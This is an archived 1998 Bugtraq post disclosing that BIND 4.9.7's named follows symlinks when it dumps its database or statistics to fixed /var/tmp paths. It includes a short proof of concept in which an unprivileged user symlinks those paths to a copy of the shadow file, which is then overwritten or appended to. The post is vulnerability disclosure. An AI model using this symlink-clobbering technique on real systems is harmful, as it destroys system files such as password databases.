[ Posted to BUGTRAQ and comp.protocols.dns.bind ] [ Standard apologies if this is already known - a search on the Bugtraq archive and Deja News comp.protocols.dns.bind doesn't indicate it.] The new named(8) happily follows symlinks and clobbers any file on the system when it receives a SIGINT. (Used for debugging and statistics gathering) SIGINT dumps the named database to /var/tmp/named_dump.db It will also happily append data to any system file when it receives a SIGIOT. SIGIOT appends named statistics to /var/tmp/named.stats. This problem is probably recursive to previous versions of named but since I've already replaced mine I can't confirm that. On Wed, 8 Apr 1998, Aleph One wrote: [Snippage of the latest CERT] > (Note: the in.named(8) man page mentions that sending a SIGINT to the > in.named process will dump the current data base and cache to, by > default, /var/tmp/named_dump.db. Some sites may find this useful in > looking for self-referential CNAMEs. Please see the in.named(8) man > page for further details.) This caught my eye in that CERT advisory and after updating my BIND to the new 4.9.7 ( RedHat 4.2 Linux 2.0.30 i586 ) and reading through the named(8) man pages I ran a quick check. [root]# cp /etc/shadow /etc/junk.shadow [root]# ls -l /etc/junk.shadow -r-------- 1 root root 992 Apr 10 12:52 junk.shadow Now as a non-priv user.. [Luser]# ln -s /etc/junk.shadow /var/tmp/named_dump.db [Luser]# ln -s /etc/junk.shadow /var/tmp/named.stats [Luser]# logout (Now if ever root sends a SIGINT or SIGIOT /etc/junk.shadow is toast...) [root]# kill -SIGIOT [named.pid] [root]# ls -al /etc/junk.shadow -r-------- 1 root root 2251 Apr 10 13:00 /etc/junk.shadow [root]# less /etc/junk.shadow someusrr:[removed of course]:10311:-1:-1:-1:-1:-1:-1 nothrusr:[removed of course]:10316:-1:-1:-1:-1:-1:-1 +++ Statistics Dump +++ (892238406) Fri Apr 10 13:00:06 1998 2368 time since boot (secs) 2368 time since reset (secs) 0 Unknown query types <SNIP> The statistics dump gets appended to any file on the system. Now for the real horror - [root]# kill -SIGINT [named.pid] [root]# ls -l /etc/junk.shadow -r-------- 1 root root 5249 Apr 10 13:02 /etc/junk.shadow [root]# less /etc/junk.shadow ; Dumped at Fri Apr 10 13:02:40 1998 ;; ++zone table++ <SNIP> No trace of the original remains. Your shadow password file or anything else on the system is fried. Enjoy. -- Joe H. Technical Support General Support: supportat_private Blarg! Online Services, Inc. Voice: 425/401-9821 or 888/66-BLARG http://www.blarg.net
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:48:55 PDT